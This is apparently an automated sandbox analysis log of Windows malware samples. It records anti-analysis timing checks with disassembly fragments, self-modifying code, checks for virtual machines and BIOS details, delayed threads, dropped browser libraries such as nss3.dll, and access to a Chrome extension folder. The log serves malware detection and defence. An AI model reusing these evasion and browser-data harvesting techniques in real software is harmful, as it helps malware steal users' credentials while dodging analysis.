                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50BC6 second address: 4A50C01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FAF7C6A41B6h 0x0000000f push dword ptr [ebp+14h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C01 second address: 4A50C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C05 second address: 4A50C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C09 second address: 4A50C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C0F second address: 4A50C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C15 second address: 4A50C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF7CBD5D3Ch 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C6F second address: 4A50C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C85 second address: 4A50C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C89 second address: 4A50C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C8D second address: 4A50C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C93 second address: 4A50C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50C99 second address: 4A50C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E4E19 second address: 7E4E23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E5056 second address: 7E505C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E505C second address: 7E5060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60A70 second address: 4A60A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60A76 second address: 4A60ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FAF7C6A41B4h 0x0000000b sbb si, 16E8h 0x00000010 jmp 00007FAF7C6A41ABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx ebx, cx 0x00000021 pushfd 0x00000022 jmp 00007FAF7C6A41ACh 0x00000027 sub ecx, 0AAB2948h 0x0000002d jmp 00007FAF7C6A41ABh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AE0714 second address: 4AE0742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D47h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AE0742 second address: 4AE0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AE0748 second address: 4AE074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AE074C second address: 4AE0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD09DD second address: 4AD09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD09E1 second address: 4AD09F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD09F8 second address: 4AD09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD09FE second address: 4AD0A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD0905 second address: 4AD090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD090B second address: 4AD092B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF7C6A41B5h 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD092B second address: 4AD0976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAF7CBD5D3Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007FAF7CBD5D3Eh 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a call 00007FAF7CBD5D41h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD0976 second address: 4AD0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop ebp 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a mov di, FADCh 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60D0B second address: 4A60D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60D11 second address: 4A60D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60D2E second address: 4A60DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 86h 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FAF7CBD5D3Fh 0x0000000d adc eax, 1426D4DEh 0x00000013 jmp 00007FAF7CBD5D49h 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAF7CBD5D3Ah 0x00000022 adc ch, FFFFFFD8h 0x00000025 jmp 00007FAF7CBD5D3Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FAF7CBD5D3Bh 0x00000036 and si, 8F9Eh 0x0000003b jmp 00007FAF7CBD5D49h 0x00000040 popfd 0x00000041 jmp 00007FAF7CBD5D40h 0x00000046 popad 0x00000047 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60DC3 second address: 4A60DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41AEh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60DD5 second address: 4A60DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, 0736h 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD0C31 second address: 4AD0C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD0C35 second address: 4AD0C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD0C3B second address: 4AD0C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FAF7C6A41ABh 0x00000011 mov ebp, esp 0x00000013 jmp 00007FAF7C6A41B6h 0x00000018 push dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF7C6A41B7h 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AD0C86 second address: 4AD0CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1B9D21EAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 movsx edi, ax 0x00000015 popad 0x00000016 push 5EEB19C3h 0x0000001b jmp 00007FAF7CBD5D47h 0x00000020 xor dword ptr [esp], 5EEA19C1h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAF7CBD5D40h 0x00000030 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSpecial instruction interceptor: First address: 62C975 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSpecial instruction interceptor: First address: 62CA51 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSpecial instruction interceptor: First address: 62A26E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSpecial instruction interceptor: First address: 803CFB instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSpecial instruction interceptor: First address: 4BC975 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSpecial instruction interceptor: First address: 4BCA51 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSpecial instruction interceptor: First address: 4BA26E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSpecial instruction interceptor: First address: 693CFB instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeCode function: 8_2_04AD0BAF rdtsc 8_2_04AD0BAF
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 2168Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 3421Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow / User API: threadDelayed 393Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow / User API: threadDelayed 2965Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow / User API: threadDelayed 671Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow / User API: threadDelayed 1153Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeAPI coverage: 0.8 %
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeAPI coverage: 0.0 %
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exe TID: 2420Thread sleep count: 275 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6824Thread sleep count: 47 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6824Thread sleep time: -94047s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5340Thread sleep count: 45 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5340Thread sleep time: -90045s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5360Thread sleep count: 393 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5360Thread sleep time: -11790000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5688Thread sleep count: 63 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5688Thread sleep time: -126063s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6544Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3040Thread sleep count: 48 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3040Thread sleep time: -96048s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476Thread sleep count: 2965 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476Thread sleep time: -5932965s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476Thread sleep count: 671 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476Thread sleep time: -1342671s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3704Thread sleep count: 1153 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3704Thread sleep time: -2307153s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe TID: 3928Thread sleep count: 349 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C8DC930
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                        Source: AAFBAKEC.0.drBinary or memory string: global block list test formVMware20,11696487552
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Microsoft Hyper-V Server
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
